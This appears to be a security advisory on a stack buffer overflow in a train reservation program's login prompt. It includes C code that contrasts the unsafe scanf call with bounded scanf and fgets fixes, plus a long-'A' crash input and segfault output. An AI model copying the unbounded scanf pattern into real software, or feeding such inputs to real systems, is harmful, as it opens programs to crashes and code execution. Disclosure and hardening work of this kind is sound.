- Train Ticket Reservation System: Version 1.0, binary compiled as ./train_reservation
- Vulnerability Type: Buffer Overflow (Stack-Based)
- Severity: HIGH
- Status: Unpatched
The vulnerability lies in the following line of code:
scanf("%s", &uname);
Calling scanf with a bare %s conversion and no field width places no limit on how many bytes are stored in uname: scanf keeps copying characters until it reaches whitespace, however long the input is. Because there is no control over the size of the user input, an attacker can write beyond the allocated buffer, overwriting adjacent stack memory and causing a segmentation fault. (Passing &uname instead of uname also gives %s a pointer-to-array rather than a char pointer; the address is the same, so the overflow behaves identically, but the argument type is wrong as well.)
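The program below is an added example, not code from the advisory or from the reservation system itself. It keeps the vulnerable call for comparison and shows two standard ways to close the hole: bounding the scanf conversion with a field width derived from the buffer size, and reading a whole line with fgets and rejecting (rather than silently truncating) anything that does not fit. The buffer size UNAME_CAP, the function names and the in-memory stream built with fmemopen are assumptions made here for the demonstration; the advisory does not say how large uname actually is.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen */
#include <stdio.h>
#include <string.h>

#define UNAME_CAP 64   /* assumed size of uname; the advisory does not state it */

/* VULNERABLE pattern from the advisory, kept only for comparison: no field
   width, so input longer than the buffer is written past its end. */
static void read_username_unsafe(char *uname) {
    (void)scanf("%s", uname);
}

/* Fix 1: bound the conversion. A width of cap-1 makes scanf stop storing
   after cap-1 bytes and append the terminator itself. The width is built at
   runtime from cap so the limit can never drift away from the buffer size.
   Returns the stored length, or -1 on EOF / matching failure. */
static int read_username_bounded(FILE *in, char *uname, size_t cap) {
    char fmt[32];
    if (cap < 2) return -1;
    snprintf(fmt, sizeof fmt, "%%%zus", cap - 1);   /* "%63s" when cap == 64 */
    if (fscanf(in, fmt, uname) != 1) return -1;
    return (int)strlen(uname);
}

/* Fix 2: read one whole line with fgets and reject over-long input instead
   of truncating it, draining the leftover bytes so the next prompt does not
   consume the tail of the attacker's input. Returns the length on success,
   -1 on EOF, -2 if the line did not fit. */
static int read_username_line(FILE *in, char *uname, size_t cap) {
    if (cap < 2 || fgets(uname, (int)cap, in) == NULL) return -1;
    size_t n = strlen(uname);
    if (n > 0 && uname[n - 1] == '\n') {          /* whole line fit, drop newline */
        uname[--n] = '\0';
        return (int)n;
    }
    /* No newline stored: the line was either exactly cap-1 bytes, ended at EOF,
       or is longer than the buffer. Peek at the next byte to tell these apart. */
    int c = getc(in);
    if (c == EOF || c == '\n') return (int)n;     /* it fit after all */
    while (c != '\n' && c != EOF) c = getc(in);   /* over-long: drain the rest */
    uname[0] = '\0';
    return -2;
}

typedef int (*reader_fn)(FILE *, char *, size_t);

/* Runs a reader over a constructed in-memory stream standing in for the
   terminal, so the hardened readers can be exercised without a tty. */
static int simulate(reader_fn read, const char *typed, char *out, size_t cap) {
    FILE *in = fmemopen((void *)typed, strlen(typed), "r");
    if (in == NULL) return -1;
    int rc = read(in, out, cap);
    fclose(in);
    return rc;
}

int main(void) {
    /* Constructed input: 200 'A's plus a newline, like the advisory's crash input. */
    char typed[202];
    memset(typed, 'A', 200);
    typed[200] = '\n';
    typed[201] = '\0';

    char uname[UNAME_CAP];
    int n = simulate(read_username_bounded, typed, uname, sizeof uname);
    printf("bounded scanf : stored %d bytes, buffer holds %zu\n", n, sizeof uname);

    n = simulate(read_username_line, typed, uname, sizeof uname);
    printf("fgets + reject: status %d (%s)\n", n, n == -2 ? "input rejected" : uname);
    return 0;
}
```

Both fixes stop the out-of-bounds write; the fgets variant is preferable for a login prompt because it also handles usernames containing spaces and leaves the stream positioned at the next line after rejecting bad input.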
- Compile the program with the name ./train_reservation.
- Execute the program and provide an overly long input to trigger the buffer overflow:
./train_reservation
At the prompt, enter the following text as the username:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The program crashes with a segmentation fault caused by the stack buffer overflow:
======================= LOGIN FORM =======================
ENTER USERNAME:-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1] 705453 segmentation fault (core dumped) ./train_reservation
- Program Crash: The system can be disrupted by malicious users supplying malformed input, leading to execution failures.
- Arbitrary Code Execution: In advanced cases, the buffer overflow may allow arbitrary code execution, compromising the system.
- Privilege Escalation: If the program is run with elevated privileges, the attack could compromise the entire machine.